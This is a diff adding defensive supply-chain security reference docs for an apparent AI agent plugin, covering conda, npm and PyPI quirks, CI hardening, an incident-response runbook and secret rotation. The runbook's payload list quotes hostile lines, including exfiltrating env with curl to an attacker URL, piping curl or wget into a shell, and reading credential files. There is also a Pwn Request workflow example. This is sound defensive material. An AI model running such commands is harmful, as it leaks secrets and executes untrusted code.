+`channel_priority: strict` prevents conda from satisfying a package from a lower-priority channel when a higher-priority channel has it — closes the dependency-confusion-style attack where a name-squat on a lower channel substitutes for a trusted package.
+
+## pixi.lock vs conda-lock.yml
+
+`pixi` produces a single multi-platform `pixi.lock` (one file, one or more platforms encoded inside). `conda-lock` is the legacy tool, producing one `conda-<platform>.lock` per platform. Both encode exact package URLs and `md5`/`sha256` hashes; both should be committed.
+
+Lockfile-respecting installs (CI):
+
+```bash
+pixi install --frozen        # fails if pixi.lock is out of sync with pixi.toml
+conda-lock install --name <env> conda-linux-64.lock
+```
+
+`pixi install` (no flag) updates `pixi.lock` if `pixi.toml` changed. Use `--frozen` in CI to refuse silent updates.
+
+## --no-deps and --no-pin (Escape Hatches)
+
+These flags bypass solver constraints and lockfiles. Any of them in CI scripts is a P1 finding.
+
+```bash
+grep -rE '(--no-deps|--no-pin|--force-reinstall|--no-update-deps)' \
+  .github/workflows/ Makefile *.sh *.yml 2>/dev/null
+```
+
+Legitimate uses are rare — usually a workaround for an unsolvable env. If found, replace with a pinned, lockfile-driven recipe or document the exception in the project README with a justification.
+
+## Signed Channel Verification (the Gap)
+
+As of 2026, conda-forge packages are not cryptographically signed. There is an experimental conda-content-trust system using TUF, but it is not on by default and not used by the major channels. The trust chain is:
+
+- HTTPS to the channel (transport integrity only)
+- Channel's own review process (conda-forge requires PR review, defaults is opaque)
+- Per-package `md5`/`sha256` recorded in repodata (channel-attested, not third-party-signed)
+
+This is a real gap versus npm provenance and PyPI's Sigstore. Document it for stakeholders rather than papering over: there is no `cosign verify` equivalent for conda packages today. Mitigations are channel discipline (above), lockfile pinning, and SBOM generation post-install via `syft <env-path>`.
+
+## pixi run / conda run Sandbox Status
+
+`pixi run <cmd>` and `conda run -n <env> <cmd>` activate the env and execute the command. Neither sandboxes the command — the script has the same filesystem and network access as the shell. Treat any `pixi run` / `conda run` line in CI the same way you'd treat a raw `bash -c` — the env-activation indirection does not add security.
+
+Audit:
+
+```bash
+grep -rE '(pixi run|conda run)' .github/workflows/ 2>/dev/null
+```
+
+Cross-link to `supply-chain-hardened-ci-cd` for the broader "treat all CI commands as untrusted code execution" pattern.
+
+## References
+
+- conda-content-trust (experimental): <https://github.com/conda/conda-content-trust>
+- pixi lockfile: <https://pixi.sh/latest/features/lockfile/>
+- conda-forge governance: <https://conda-forge.org/docs/orga/governance/>
+- channel priority semantics: <https://conda.io/projects/conda/en/latest/user-guide/concepts/installing-with-conda.html#strict-channel-priority>

--- a/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/npm-quirks.md
+++ b/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/npm-quirks.md
@@ -1,0 +1,87 @@
+# npm / yarn / pnpm Supply Chain Quirks
+
+## Threat Relevance
+
+npm's install-time script execution is the single most-exploited supply-chain vector in the JavaScript ecosystem. The Shai-Hulud worm propagates via `postinstall` scripts; the `ua-parser-js`, `coa`, and `rc` compromises all executed payloads at `npm install` time before any project code ran. Yarn classic shares this default; only `pnpm` (since v7) and `yarn berry` (Plug'n'Play mode) ship safer defaults. Lockfile discipline, registry-proxy config, and provenance attestations are the other config knobs that decide whether the general "pin and scan" advice from `supply-chain-dependency-security` actually holds for a Node project.
+
+## Install-Time Script Execution
+
+Every `npm install` runs `preinstall`, `install`, and `postinstall` scripts from every dependency, transitively. This is the Shai-Hulud landing zone.
+
+Disable globally via `.npmrc`:
+
+```bash
+echo "ignore-scripts=true" >> .npmrc
+grep -q 'ignore-scripts=true' .npmrc && echo "PASS: scripts disabled"
+```
+
+Or per-command in CI:
+
+```bash
+npm ci --ignore-scripts
+```
+
+`pnpm` v7+ disables lifecycle scripts for non-allowlisted packages by default — see `pnpm.onlyBuiltDependencies` in `package.json`. `yarn berry` (v2+) with PnP mode does not run install scripts unless explicitly enabled via `enableScripts: true` in `.yarnrc.yml`. Call this out when recommending a package manager: switching from npm to pnpm reduces this attack surface without code changes.
+
+## .npmrc Knobs That Affect Security
+
+Audit `.npmrc` (project root and `~/.npmrc`) for these settings. Each line below is the desired state plus the verifying command.
+
+- `package-lock=true` — always commit the lockfile.
+  `grep -q 'package-lock=true' .npmrc || echo "WARN: package-lock not pinned"`
+- `audit-level=high` or `critical` — fail `npm audit` on real issues only.
+  `grep -E 'audit-level=(high|critical)' .npmrc`
+- `fund=false` — suppresses funding-prompt noise that hides real warnings.
+  `grep -q 'fund=false' .npmrc`
+- `save-exact=true` — defaults installs to exact versions instead of `^x.y.z` ranges.
+  `grep -q 'save-exact=true' .npmrc`
+- `engine-strict=true` — refuses installs on the wrong Node version.
+  `grep -q 'engine-strict=true' .npmrc`
+
+## npm ci vs npm install
+
+`npm ci` requires `package-lock.json` to exist and refuses to modify it; it deletes `node_modules/` first and installs exactly what the lock specifies. `npm install` will silently rewrite the lockfile to match new ranges in `package.json` if it finds satisfying versions. In CI, always use `npm ci`. The failure mode if you don't:
+
+```bash
+# in CI, this silently upgrades patches across the dep tree
+npm install        # BAD: rewrites package-lock.json, defeats pin discipline
+npm ci             # GOOD: respects the lockfile, fails if lock is out of sync
+```
+
+Verify CI uses `npm ci`: `grep -rE 'npm (install|ci)' .github/workflows/ | grep -v 'npm ci'`.
+
+## npm Provenance Attestations
+
+`npm publish --provenance` (npm v9.5+) generates a Sigstore attestation tied to the GitHub Actions workflow that built the package. The attestation is uploaded to the public Sigstore Rekor log and displayed on the npm registry page.
+
+```bash
+# In a publish job with permissions: id-token: write
+npm publish --provenance --access public
+```
+
+Verify a consumed package:
+
+```bash
+npm audit signatures
+```
+
+Cross-link: see `supply-chain-sbom-provenance` for the full Sigstore/SLSA story and `references/sigstore-cookbook.md` in that skill for the `permissions:` block.
+
+## pnpm and Yarn Berry Specifics
+
+`pnpm` uses a content-addressable store with symlinks — no flat `node_modules/`, and each package only sees its direct deps. This kills the implicit-dependency attack class (a transitive can't be `require()`'d unless declared). Lifecycle scripts gated by `pnpm.onlyBuiltDependencies` in `package.json`:
+
+```json
+{ "pnpm": { "onlyBuiltDependencies": ["esbuild", "sharp"] } }
+```
+
+`yarn berry` (v2+) PnP mode replaces `node_modules/` with a `.pnp.cjs` resolver file. No filesystem dependency tree means no install scripts can write to it. Switch via `yarn set version berry && yarn config set nodeLinker pnp`.
+
+Both options reduce install-time-script attack surface versus npm classic — recommend either when the project is willing to migrate.
+
+## References
+
+- npm docs: <https://docs.npmjs.com/cli/v10/configuring-npm/npmrc>
+- npm provenance: <https://docs.npmjs.com/generating-provenance-statements>
+- pnpm onlyBuiltDependencies: <https://pnpm.io/package_json#pnpmonlybuiltdependencies>
+- Shai-Hulud writeup: cross-link to `supply-chain-threat-awareness`

--- a/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/pypi-quirks.md
+++ b/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/pypi-quirks.md
@@ -1,0 +1,103 @@
+# PyPI / pip / uv / poetry Supply Chain Quirks
+
+## Threat Relevance
+
+Python's packaging history has accumulated several arbitrary-code-execution surfaces that don't exist in other ecosystems: `.pth` files run at every interpreter start, `setup.py` runs at install for source distributions, custom `build_wheel` backends run in build-isolated subprocesses, and `--no-build-isolation` removes the isolation. LiteLLM 1.82.8 exploited `.pth` execution; PyTorch nightly compromises came through `setup.py`. The general "pin to lockfile and scan" pattern from `supply-chain-dependency-security` doesn't help if the install step itself runs adversary-controlled Python.
+
+## .pth Files (LiteLLM 1.82.8 Vector)
+
+A `.pth` file in `site-packages/` is normally a list of directory paths, one per line, that Python adds to `sys.path` at startup via `site.addsitedir`. But Python's `site` module also executes any line that starts with `import` or `exec`. A malicious package that drops a single `.pth` file gets persistent, every-interpreter-start code execution — no `import` of the package required.
+
+Detect rogue `.pth` files:
+
+```bash
+find $(python -c "import site; print(site.getsitepackages()[0])") \
+  -name "*.pth" -exec grep -lE '^(import|exec|os\.|subprocess)' {} \;
+```
+
+A legitimate `.pth` file looks like `./relative/path/to/module`. Anything matching the regex above is executing code at interpreter start. Investigate every match.
+
+## setup.py Execution at Install
+
+Legacy sdist packages execute `setup.py` (arbitrary Python) at install time. PEP 517 build isolation runs this in a temporary venv, which limits some damage but still grants the script full filesystem read, outbound network, and write to the build temp dir. Wheel installs skip this — wheels are pre-built artifacts.
+
+Force the source path (and trigger `setup.py`):
+
+```bash
+pip install --no-binary <pkg> <pkg>   # forces source build, runs setup.py
+```
+
+Prefer wheels in CI and lockfiles:
+
+```bash
+pip install --only-binary :all: -r requirements.txt
+```
+
+If a package has no wheels for your platform, audit its `setup.py` before installing, or build the wheel once in a sandboxed environment and host it on an internal index.
+
+## build_wheel and backend-path in pyproject.toml
+
+PEP 517 lets a project declare a custom build backend in `pyproject.toml`:
+
+```toml
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+# or, dangerously:
+backend-path = ["./_custom_build"]   # backend is project-supplied code
+```
+
+A `backend-path` pointing to project code means installing the package executes that project-supplied backend in an isolated env. `pip install --no-build-isolation` removes the isolation, putting the backend's code in the user's Python.
+
+Audit:
+
+```bash
+grep -E '^(build-backend|backend-path)' pyproject.toml
+grep -rE 'no-build-isolation' .github/workflows/ Makefile *.sh 2>/dev/null
+```
+
+Flag any `--no-build-isolation` in CI and any non-standard `build-backend`.
+
+## OIDC Trusted Publishing for PyPI
+
+The modern way to publish to PyPI from GitHub Actions — no long-lived API tokens.
+
+Setup steps:
+
+1. On <https://pypi.org/manage/account/publishing/>, register a trusted publisher: owner, repo, workflow filename, environment (optional but recommended).
+2. In the publish workflow, grant `id-token: write` and use the official action:
+
+```yaml
+permissions:
+  id-token: write
+jobs:
+  release:
+    environment: pypi
+    steps:
+      - uses: pypa/gh-action-pypi-publish@release/v1
+```
+
+3. No `PYPI_API_TOKEN` secret. PyPI verifies the GitHub OIDC token against the trusted-publisher record at upload time.
+
+Cross-link: `supply-chain-hardened-ci-cd` for the broader OIDC + permissions story; `supply-chain-sbom-provenance` for PyPI's automatic Sigstore attestation on OIDC uploads.
+
+## uv and poetry Lockfile Differences
+
+`uv.lock` (uv v0.4+) is a TOML lockfile with per-package hashes and platform markers. `poetry.lock` is a TOML lockfile with hashes. Both must be committed.
+
+Lockfile-respecting installs (CI):
+
+```bash
+uv sync --frozen           # uv: fail if lockfile is out of sync
+poetry install --no-update # poetry: never modify the lockfile
+pip install --require-hashes -r requirements.txt  # pip-tools compiled
+```
+
+Plain `pip install -r requirements.txt` does not enforce hashes unless the requirements file uses `--hash=sha256:...` lines. Generate hash-pinned requirements with `pip-compile --generate-hashes` (pip-tools) or `uv pip compile --generate-hashes`.
+
+## References
+
+- PEP 517 build backends: <https://peps.python.org/pep-0517/>
+- PyPI trusted publishing: <https://docs.pypi.org/trusted-publishers/>
+- uv lockfile: <https://docs.astral.sh/uv/concepts/projects/lock/>
+- `.pth` mechanism: Python `site` module docs, `site.addsitedir`

--- a/plugins/supply-chain-security/skills/supply-chain-hardened-ci-cd/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-hardened-ci-cd/SKILL.md
@@ -1,0 +1,102 @@
+---
+name: supply-chain-hardened-ci-cd
+description: Hardened GitHub Actions release workflow patterns for supply-chain security. Use when reviewing or writing GitHub Actions release workflows (.github/workflows/*.yml). Contains SHA-pinning, OIDC trusted publishing, two-job build/publish split, --ignore-scripts, Pwn Request prevention, deny-by-default permissions, and egress hardening patterns. Triggered by March 2026 TeamPCP campaign that specifically hijacked release tags.
+---
+
+# Supply Chain Hardened CI/CD
+
+## GitHub Actions Audit Checklist
+
+Run on every `.github/workflows/*.yml` file reviewed. Flag each failure with its specific line.
+
+- [ ] All `uses:` references pinned to **40-character commit SHAs** — not `@v4`, `@main`, etc.
+  - March 2026 TeamPCP campaign specifically hijacked release tags on Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP
+- [ ] `permissions: {}` at workflow level with per-job opt-in; no job has broader permissions than needed
+- [ ] No `pull_request_target` trigger combined with `actions/checkout` of the PR head SHA (Pwn Request — runs with secrets in target repo context)
+- [ ] Build and publish steps in **separate jobs**; registry credentials exist only in the publish job
+- [ ] `npm ci --ignore-scripts` (or Python equivalent) in install steps — `preinstall`/`postinstall` hooks are the dominant execution vector
+- [ ] No long-lived secrets where OIDC Trusted Publishing is available (PyPI, npm)
+- [ ] GitHub environment with required reviewers gates the publish job
+- [ ] Artifact verified (checksums, provenance) before publication
+- [ ] Cache keys scoped to avoid cross-fork poisoning
+- [ ] Egress firewall or `harden-runner` with `egress-policy: block` preferred for release jobs
+- [ ] SBOM generated for releases; signatures verified (Sigstore, npm provenance)
+
+## Key Hardening Patterns
+
+### SHA-pinning
+
+```yaml
+# Bad
+- uses: actions/checkout@v4
+
+# Good
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683  # v4.2.2
+```
+
+Verify the SHA belongs to the expected tag: `git -C <cloned-actions-repo> tag --points-at <sha>`
+
+### OIDC Trusted Publishing (no long-lived tokens)
+
+```yaml
+permissions:
+  id-token: write
+  contents: read
+
+- uses: pypa/gh-action-pypi-publish@release/v1
+  # No TWINE_PASSWORD or API token needed
+```
+
+### Two-job split (build / publish)
+
+```yaml
+jobs:
+  build:
+    permissions:
+      contents: read
+    steps:
+      - run: python -m build
+      - uses: actions/upload-artifact@...
+
+  publish:
+    needs: build
+    environment: pypi-release  # requires reviewer approval
+    permissions:
+      id-token: write
+    steps:
+      - uses: actions/download-artifact@...
+      - uses: pypa/gh-action-pypi-publish@...
+```
+
+Registry credentials (OIDC or token) appear **only** in the publish job. The build job has no network write access.
+
+### Deny-by-default permissions
+
+```yaml
+permissions: {}  # deny all at workflow level
+
+jobs:
+  test:
+    permissions:
+      contents: read  # minimum needed
+```
+
+### Pwn Request prevention
+
+Never combine `pull_request_target` with checkout of the PR head:
+
+```yaml
+# Dangerous
+on: pull_request_target
+steps:
+  - uses: actions/checkout@...
+    with:
+      ref: ${{ github.event.pull_request.head.sha }}  # executes untrusted code with secrets
+```
+
+Use `pull_request` (no secrets) or audit all code paths before accessing secrets in `pull_request_target`.
+
+## Findings Format
+
+For each finding: file path, line number, violation type (e.g., "mutable tag reference", "Pwn Request pattern"), and remediation (the exact SHA-pinned replacement or restructured job split).
+

--- a/plugins/supply-chain-security/skills/supply-chain-incident-response/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-incident-response/SKILL.md
@@ -1,0 +1,105 @@
+---
+name: supply-chain-incident-response
+description: Incident-response runbook for supply-chain compromises. Use when an advisory, CVE, GHSA, or campaign report names a dependency or GitHub Action this project uses; when responding to a Shai-Hulud-style maintainer takeover; or when a TeamPCP-style tag hijack is reported. Walks the lockfile-check → CI-cache-check → secret-rotation → persistence-artifact-hunt 4-point check end-to-end.
+metadata:
+  references:
+    - references/runbook-account-takeover.md
+    - references/runbook-tag-hijack.md
+    - references/secret-rotation.md
+  assets:
+    - assets/incident-report-template.md
+---
+
+# Supply Chain Incident Response
+
+## Threat Model
+
+Scanner-clean post-advisory does not mean clean during the exposure window. The 4-point check (lockfile, CI cache, secrets, persistence) is the irreducible work to determine what the bad version actually touched.
+
+## Triage Flow
+
+Run in order. Each step has a verifying command and a concrete output. Do not advance until the previous step's output is captured.
+
+### Step 1 — Parse the advisory
+
+```bash
+# If GHSA: fetch and parse
+gh api /advisories/<id> --jq '{summary, affected: .vulnerabilities | map({pkg: .package.name, range: .vulnerable_version_range})}'
+
+# If CVE: lookup on GitHub
+gh api search/issues --raw-field q="<cve-id>" --jq '.items[].html_url' | head -5
+```
+
+Output: affected package names, version ranges, and exposure window (publish time of bad version → yank time, or now if unyanked).
+
+### Step 2 — Determine when this project resolved the bad version
+
+```bash
+# Show lockfile history for the affected package
+git log --oneline --follow -p -- <lockfile> | grep -B 2 -E "<affected-package>"
+```
+
+Output: commits and timestamps showing when this project pinned the bad version. Cross-reference against the exposure window from Step 1 to confirm overlap. If no overlap → PASS, stop here, document.
+
+Scope determination (which lockfiles even mention the package) is the Lockfile item in the 4-Point Check below — go there next.
+
+## The 4-Point Check
+
+For each item: run the command, record PASS / EXPOSED / UNKNOWN with evidence for the incident report.
+
+1. **Lockfile** — did any of our lockfiles resolve to the affected version?
+   ```bash
+   # Search every ecosystem's lockfile + manifest in one pass
+   for pkg in <pkg1> <pkg2>; do
+     git grep -nE "\"$pkg\"|^$pkg\\s|^$pkg==" -- '**/lock*' 'pyproject.toml' 'package.json' 'pixi.toml' 'Cargo.toml' 'go.mod'
+   done
+   ```
+2. **CI cache** — did any workflow cache contain a build that used the affected version during the exposure window?
+   ```bash
+   gh actions cache list --sort created --order desc --json key,createdAt | jq '.[] | select(.createdAt > "<exposure-start>")'
+   ```
+3. **Secrets** — what secrets were in scope when the bad version executed?
+   ```bash
+   gh secret list && grep -rE 'env:|secrets\.' .github/workflows/
+   ```
+4. **Persistence** — did the bad version leave any artifact that survives?
+   ```bash
+   # Python .pth
+   find $(python -c "import site; print(site.getsitepackages()[0])" 2>/dev/null) -name "*.pth" 2>/dev/null
+   # npm bin/
+   find node_modules/.bin -type f -newer <date>
+   ```
+
+Every result feeds the incident report's 4-Point Check Results table.
+
+## Phases
+
+### Containment
+
+Pin a known-good version in the lockfile. Invalidate every CI cache built during the exposure window (`gh actions cache delete <key>`). Disable any workflow that ran the affected version until eradication is complete (`gh workflow disable <file>`).
+Done when: every lockfile pin is updated and every cached artifact from the window is purged.
+
+### Eradication
+
+Rotate every secret enumerated in the 4-point check using `references/secret-rotation.md`. Hunt persistence artifacts using the appropriate runbook: `references/runbook-account-takeover.md` for npm/PyPI maintainer takeover, `references/runbook-tag-hijack.md` for GitHub Action tag hijack.
+Done when: every in-scope secret has a new value AND every persistence artifact is removed.
+
+### Recovery
+
+Rebuild the project from the clean lockfile with no caches (`gh workflow run <release> --field skip-cache=true`). Verify the rebuilt artifacts' provenance using the `supply-chain-sbom-provenance` skill if SBOM/attestations are configured.
+Done when: rebuilt artifact matches expected provenance and tests pass.
+
+### Post-incident
+
+Fill `assets/incident-report-template.md`. Update posture using the `supply-chain-threat-awareness` skill. File a GHSA at `https://github.com/<owner>/<repo>/security/advisories/new` if this project itself shipped an affected version.
+Done when: incident report is complete and prevention items are linked to skills/commands.
+
+## Choose Your Runbook
+
+- Maintainer account takeover (Shai-Hulud-style npm/PyPI compromise) → `references/runbook-account-takeover.md`
+- Release tag hijacking (TeamPCP-style GitHub Action mutation) → `references/runbook-tag-hijack.md`
+- Secret rotation (every incident, regardless of vector) → `references/secret-rotation.md`
+
+## Output: Incident Report
+
+Produce a filled copy of `assets/incident-report-template.md`. Every section must be populated — leave none as placeholder. Each 4-point check item gets PASS / EXPOSED / UNKNOWN with evidence (`file:line`, run URL, cache key, or "absent") and a follow-up action. Every Prevention Item must link to a skill or `/command` in this plugin.

--- a/plugins/supply-chain-security/skills/supply-chain-incident-response/assets/incident-report-template.md
+++ b/plugins/supply-chain-security/skills/supply-chain-incident-response/assets/incident-report-template.md
@@ -1,0 +1,58 @@
+# Supply Chain Incident Report
+
+**Incident ID:** <unique id, e.g., SC-2026-001>
+**Date detected:** <YYYY-MM-DD HH:MM TZ>
+**Date contained:** <YYYY-MM-DD HH:MM TZ>
+**Date eradicated:** <YYYY-MM-DD HH:MM TZ>
+**Date recovered:** <YYYY-MM-DD HH:MM TZ>
+**Status:** <Active / Contained / Eradicated / Recovered / Closed>
+
+## Scope
+
+**Advisory or campaign:** <CVE-XXXX-XXXX, GHSA-xxxx-xxxx-xxxx, or campaign name>
+**Affected package(s) and version range(s):**
+- `<package>` `<range>`
+
+**Exposure window:** <YYYY-MM-DD HH:MM TZ> to <YYYY-MM-DD HH:MM TZ>
+
+**Confirmed exposure:**
+- [ ] Lockfile resolved an affected version: <evidence — file:line>
+- [ ] CI cache contained an affected version: <evidence — workflow run ID>
+- [ ] Workflow execution touched an affected version: <evidence — run URL>
+- [ ] Production deployment included an affected version: <evidence>
+
+## 4-Point Check Results
+
+| Check | Status | Evidence | Action |
+|-------|--------|----------|--------|
+| Lockfile | PASS / EXPOSED / UNKNOWN | <evidence> | <action taken> |
+| CI cache | PASS / EXPOSED / UNKNOWN | <evidence> | <action taken> |
+| Secrets | PASS / EXPOSED / UNKNOWN | <evidence> | <action taken> |
+| Persistence | PASS / EXPOSED / UNKNOWN | <evidence> | <action taken> |
+
+## Timeline
+
+| Time | Event | Actor |
+|------|-------|-------|
+| <YYYY-MM-DD HH:MM TZ> | <event> | <actor> |
+
+## Eradication Actions
+
+For each: command run, output observed, result.
+
+1. <action>
+   - Command: `<command>`
+   - Result: <outcome>
+
+## Residual Risk
+
+<Anything not fully eradicated; ongoing monitoring required.>
+
+## Prevention Items
+
+Link each to a skill or command in this plugin:
+- [ ] <prevention item> — `<skill or /command>`
+
+## Lessons Learned
+
+<What detection or response gap allowed this; what changes prevent recurrence.>

--- a/plugins/supply-chain-security/skills/supply-chain-incident-response/references/runbook-account-takeover.md
+++ b/plugins/supply-chain-security/skills/supply-chain-incident-response/references/runbook-account-takeover.md
@@ -1,0 +1,95 @@
+# Runbook: Maintainer Account Takeover (Shai-Hulud / axios-style)
+
+## Pattern
+
+An attacker compromises a package maintainer's credentials (phishing, leaked token, session theft) and publishes a malicious version under the legitimate package name. The payload typically runs at install time — `postinstall` for npm, `setup.py`/`.pth` for Python — and exfiltrates environment variables, CI secrets, or cloud credentials to an attacker-controlled URL. The malicious version is often yanked within hours, but every CI run, developer install, and cached artifact during the window is potentially compromised.
+
+## Scope Determination
+
+Search every lockfile in the repo for the affected package name. Use ecosystem-appropriate patterns.
+
+**npm / yarn / pnpm:**
+```bash
+git grep -nE "\"<pkg>\"" -- 'package-lock.json' 'yarn.lock' 'pnpm-lock.yaml' 'package.json'
+```
+
+**PyPI (pip / poetry / uv / pixi):**
+```bash
+git grep -nE "^<pkg>==|name = \"<pkg>\"" -- 'requirements*.txt' 'poetry.lock' 'uv.lock' 'pixi.lock' 'pyproject.toml'
+```
+
+**conda:**
+```bash
+git grep -nE "<pkg>=" -- 'environment*.yml' 'conda-lock.yml' 'pixi.lock'
+```
+
+**cargo:**
+```bash
+git grep -nE "name = \"<pkg>\"" -- 'Cargo.lock' 'Cargo.toml'
+```
+
+**Go:**
+```bash
+git grep -nE "<pkg> v" -- 'go.sum' 'go.mod'
+```
+
+Record every `file:line` hit. Empty across all ecosystems = PASS for the lockfile check.
+
+## CI Cache Nuke
+
+Every cache built during the exposure window may contain the bad version. List, filter, delete.
+
+```bash
+# List caches created after exposure start
+gh actions cache list --sort created --order desc --limit 100 \
+  --json key,createdAt,ref \
+  | jq -r '.[] | select(.createdAt > "<exposure-start-iso>") | .key'
+
+# Batch delete
+gh actions cache list --sort created --order desc --limit 100 \
+  --json key,createdAt \
+  | jq -r '.[] | select(.createdAt > "<exposure-start-iso>") | .key' \
+  | while read -r key; do gh actions cache delete "$key"; done
+```
+
+Also purge any registry mirror caches (Artifactory, Verdaccio, devpi) covering the window — cache nuke is incomplete without these.
+
+## Persistence Hunt
+
+The payload may have written files that survive a `node_modules` or virtualenv rebuild.
+
+**npm:**
+```bash
+# Bin shims modified during the window
+find node_modules/.bin -type f -newer <YYYY-MM-DD>
+# Unexpected .npmrc entries (e.g., custom registry, prepublish hooks)
+cat .npmrc ~/.npmrc 2>/dev/null
+# Suspicious postinstall in any direct or transitive dep
+jq -r '.. | objects | select(.scripts?.postinstall) | .name + ": " + .scripts.postinstall' node_modules/*/package.json
+```
+
+**Python:**
+```bash
+# .pth files that exec code at import (LiteLLM 1.82.8 pattern)
+SITE=$(python -c 'import site; print(site.getsitepackages()[0])')
+find "$SITE" -name "*.pth" -exec grep -lE '^(import|exec|os\.|subprocess)' {} \;
+# usercustomize/sitecustomize
+find "$SITE" -name 'sitecustomize.py' -o -name 'usercustomize.py'
+```
+
+**cargo:**
+```bash
+# Recently-built build.rs invocations in target/
+find target -name 'build-script-build' -newer <YYYY-MM-DD>
+# Suspicious build.rs in vendored deps
+grep -rE 'Command::new|reqwest|curl' ~/.cargo/registry/src/*/<pkg>-*/build.rs 2>/dev/null
+```
+
+Any hit → EXPOSED, remove the artifact, add to incident report evidence.
+
+## Common Payload Behaviors
+
+- **Env var exfiltration:** `curl -X POST <attacker-url> -d "$(env)"` or equivalent in any language. Search CI logs for outbound POSTs to unknown hosts during exposure window.
+- **Dropper for second-stage:** payload downloads and executes a follow-up binary. Look for `curl | sh`, `wget -O - | bash`, or `eval(fetch(...))` patterns in install scripts.
+- **Credential theft from disk:** reads `~/.aws/credentials`, `~/.npmrc`, `~/.docker/config.json`, `.git-credentials`. Treat any secret stored unencrypted on disk during the window as compromised.
+- **Worm propagation:** payload uses the stolen npm/PyPI token to publish itself to other packages owned by the same maintainer (Shai-Hulud signature behavior). Audit the affected maintainer's full package list, not just the named package.

--- a/plugins/supply-chain-security/skills/supply-chain-incident-response/references/runbook-tag-hijack.md
+++ b/plugins/supply-chain-security/skills/supply-chain-incident-response/references/runbook-tag-hijack.md
@@ -1,0 +1,69 @@
+# Runbook: GitHub Action Release Tag Hijacking (TeamPCP-style)
+
+## Pattern
+
+An attacker with write access to an action's repo (via compromised maintainer credentials, malicious contributor merge, or repo takeover) mutates an existing release tag — or publishes a new patch under a floating major-tag alias like `@v3` — to point at a malicious commit. Every workflow that pinned to the tag (rather than a 40-char SHA) now runs attacker code on its next execution, with whatever secrets and OIDC permissions the action had in scope. Detection requires comparing the tag's current SHA against the last known-good SHA from a successful run.
+
+## Audit Step
+
+For each `uses:` reference in workflows, resolve the tag's current SHA and compare against the SHA observed in a recent known-good run.
+
+```bash
+# Enumerate all uses: refs (action@ref form)
+grep -hoE 'uses: [a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+@[^[:space:]]+' .github/workflows/*.yml | sort -u
+
+# For each ref, resolve current SHA via gh api
+for ref in $(grep -hoE 'uses: [a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+@[^[:space:]]+' .github/workflows/*.yml | sort -u); do
+  spec="${ref#uses: }"
+  action="${spec%@*}"
+  tag="${spec#*@}"
+  # 40-char hex = already SHA-pinned, immune to tag mutation
+  if [[ "$tag" =~ ^[a-f0-9]{40}$ ]]; then
+    echo "PINNED $spec"
+  else
+    sha=$(gh api "repos/$action/git/refs/tags/$tag" --jq '.object.sha' 2>/dev/null \
+       || gh api "repos/$action/commits/$tag" --jq '.sha' 2>/dev/null)
+    echo "FLOATING $spec -> $sha"
+  fi
+done
+```
+
+Compare each `FLOATING` SHA against the SHA recorded in the last successful workflow run (see Workflow Run Forensics below). Mismatch = potential hijack, treat as EXPOSED until proven otherwise. See `/supply-chain-pin-actions` for the SHA-pinning fix.
+
+## Workflow Run Forensics
+
+For each workflow that used the suspect action, enumerate runs during the exposure window and identify which secrets were in scope.
+
+```bash
+# Runs of a given workflow in the window
+gh run list --workflow=<file>.yml --created ">=<exposure-start>" \
+  --json databaseId,createdAt,headSha,conclusion,url
+
+# For a specific run, list the secrets referenced in its job env/steps
+gh api "repos/<owner>/<repo>/actions/runs/<run-id>/jobs" \
+  --jq '.jobs[] | {name, steps: [.steps[] | .name]}'
+
+# Dump the workflow file as it existed at that commit (to see env:/with: secrets)
+gh api "repos/<owner>/<repo>/contents/.github/workflows/<file>.yml?ref=<headSha>" \
+  --jq '.content' | base64 -d
+```
+
+Each run in the window where the action could have read secrets is a separate EXPOSED instance for the incident report.
+
+## Secret Rotation Prioritization
+
+The action only had access to whatever was passed via `env:`, `with:`, or available through `${{ secrets.* }}` and OIDC. Rotate in this order:
+
+1. **Registry publishing tokens** (PyPI, npm, crates.io, Docker Hub) — attacker can publish malicious successor versions immediately.
+2. **OIDC-issued cloud credentials** (AWS, GCP, Azure via federated identity) — short-lived but may already be in use; revoke active sessions.
+3. **Signing keys** (cosign, GPG, Sigstore identity) — attacker can forge attestations on hijacked artifacts.
+4. **Repo write tokens** (PATs, deploy keys, GH App installations) — used to escalate persistence into the repo itself.
+
+Full procedures in `secret-rotation.md`.
+
+## Hardening Going Forward
+
+- Replace every floating tag with a 40-char SHA: `/supply-chain-pin-actions` (dry-run first).
+- Add deny-by-default permissions to every workflow: `/supply-chain-harden-workflow`. An action that can't read secrets can't exfiltrate them on hijack.
+- Enable Dependabot for `package-ecosystem: github-actions` so SHA bumps land via reviewable PRs.
+- Cross-link to the `supply-chain-hardened-ci-cd` skill for end-to-end pipeline lockdown (minimal permissions, OIDC publishing, no PRs with secret access from forks).

--- a/plugins/supply-chain-security/skills/supply-chain-incident-response/references/secret-rotation.md
+++ b/plugins/supply-chain-security/skills/supply-chain-incident-response/references/secret-rotation.md
@@ -1,0 +1,104 @@
+# Secret Rotation Runbook
+
+## Safe Rotation Order
+
+For every credential type below: **issue the new credential first, deploy it to all consumers, verify, then revoke the old one.** Never revoke first unless you have a confirmed list of consumers — surprise revocations break production and provide cover for further attacker action. The only exception: if you have direct evidence the old credential is actively in use by the attacker (e.g., outbound traffic from your CI to an unknown host), revoke immediately and accept the downtime.
+
+## PyPI Tokens
+
+1. Generate replacement: `https://pypi.org/manage/account/token/` → scope to single project where possible.
+2. Update consumer: `gh secret set PYPI_API_TOKEN --body "<new>"`.
+3. Verify with a no-op release dry-run (`twine upload --repository testpypi dist/*`).
+4. Revoke old token from the same management page.
+5. **Durable fix:** migrate to OIDC trusted publishing — see `supply-chain-hardened-ci-cd`. Eliminates the long-lived token entirely.
+
+## npm Tokens
+
+```bash
+# List all tokens for the account
+npm token list
+# Create a replacement (publish + automation read scope)
+npm token create --read-only=false --cidr=0.0.0.0/0
+# Update CI
+gh secret set NPM_TOKEN --body "<new>"
+# Verify a publish dry-run
+npm publish --dry-run
+# Revoke the old token by ID
+npm token revoke <old-token-id>
+```
+
